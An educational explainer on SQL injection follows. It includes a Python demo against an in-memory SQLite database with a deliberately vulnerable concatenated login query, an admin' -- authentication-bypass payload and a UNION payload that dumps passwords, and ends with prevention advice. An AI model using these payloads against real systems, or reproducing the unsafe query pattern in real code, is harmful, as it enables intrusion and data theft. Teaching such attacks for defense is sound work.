SQL injection is a security vulnerability where an attacker injects malicious SQL code into application input fields (like login boxes or search forms) so that the database executes unintended commands. This can allow attackers to read, modify, or delete data, or even gain full control of the database.
SQL injection typically occurs when an application concatenates user input directly into the SQL text instead of passing it to the database separately as a parameter. Once the input is part of the query string, the database cannot tell where the developer's SQL ends and the attacker's input begins.
How SQL Injection Works
Suppose a login query is built like this (unsafe):
If an attacker enters admin' -- as the username, the query becomes:
Everything after -- is a SQL comment, so the rest of the WHERE clause, including the password check, is never evaluated: the query matches the admin row without a valid password. (Some DBMSs, such as MySQL, require whitespace after --, which is why attackers commonly send a trailing space.)
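The login query itself is not reproduced on this page, so the following is an added example (not the page's own code) that reconstructs the pattern described above. It assumes a hypothetical users table with username and password columns, seeds it with constructed sample rows (plaintext passwords only to keep the demo short), builds the login query by string concatenation exactly as the text describes, and shows the admin' -- bypass. It also shows the data-theft variant from the next section: a search form whose LIKE pattern is concatenated the same way lets a UNION payload pull the password column into the results.

```python
import sqlite3

# Constructed sample data for this example; not from the original page.
USERS = [("admin", "s3cret-admin-pw"), ("alice", "alice-pw")]


def make_db():
    """In-memory SQLite database with a hypothetical users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def build_login_sql(username, password):
    """UNSAFE: user input is spliced straight into the SQL text."""
    return (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )


def vulnerable_login(conn, username, password):
    """Returns the matched username, or None. Vulnerable by design."""
    row = conn.execute(build_login_sql(username, password)).fetchone()
    return row[0] if row else None


def vulnerable_search(conn, term):
    """UNSAFE search form: the LIKE pattern is concatenated the same way."""
    sql = "SELECT username FROM users WHERE username LIKE '%" + term + "%'"
    return [r[0] for r in conn.execute(sql)]


if __name__ == "__main__":
    conn = make_db()

    # Normal use: wrong password fails, right password succeeds.
    print(vulnerable_login(conn, "admin", "wrong"))            # None
    print(vulnerable_login(conn, "admin", "s3cret-admin-pw"))  # admin

    # Attack: the closing quote ends the string literal and -- comments
    # out the password check, so the admin row matches with any password.
    payload = "admin' --"
    print(build_login_sql(payload, "wrong"))
    # SELECT username FROM users WHERE username = 'admin' --' AND password = 'wrong'
    print(vulnerable_login(conn, payload, "wrong"))            # admin

    # Data theft: a UNION appended through the search box returns the
    # password column alongside the usernames the query was meant to list.
    leak = "%' UNION SELECT password FROM users --"
    print(sorted(vulnerable_search(conn, leak)))
```

Run it as a script to see the concatenated SQL text and the leaked passwords. The UNION payload works because the injected SELECT returns the same number of columns as the original query; in a real assessment the attacker would first probe for the column count.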
Common Attack Effects
Data theft:
Attackers can select sensitive data such as passwords or personal information.
Data modification or deletion:
Injected commands can UPDATE or DELETE records.
Privilege escalation:
If the application's database account holds elevated rights, injected statements can run administrative commands, such as creating accounts or altering the schema, and on some DBMSs reach the underlying host through built-in functions.
How to Prevent SQL Injection
Use parameterized queries / prepared statements:
Send the SQL text and the user-supplied values to the DBMS separately, so the input is treated as data and can never change the structure of the query. Parameters can only carry values: table and column names, ORDER BY targets and similar identifiers cannot be bound, so those must be checked against an allow-list in the application.
Input validation and sanitization:
Validate input against an allow-list of what it is expected to look like (type, length, character set) rather than trying to strip "suspicious" characters; blacklists of characters are routinely bypassed. Treat validation as defense in depth, not as a substitute for parameterized queries.
Least‑privilege database accounts:
Ensure the application's database user has only the permissions it actually needs (for example, no DDL rights and no access to unrelated tables), so that a successful injection is limited in what it can read or change.
Web application firewalls (WAF):
Add an extra layer that detects and blocks common injection patterns. A WAF is a supplementary control only: encoding tricks and unusual syntax can evade signature rules, so it must not be relied on as the primary defense.
For beginners, SQL injection is like an attacker sneaking instructions into a form letter: instead of answering the question, they rewrite the whole sentence to trick the system into doing something it wasn’t supposed to.
Summary
SQL injection happens when attackers insert SQL syntax through application inputs that are concatenated into queries, tricking the database into running unintended commands. Parameterized queries are the primary defense; allow-list input validation, least-privilege database accounts and a WAF add further layers that limit what a missed injection point can do.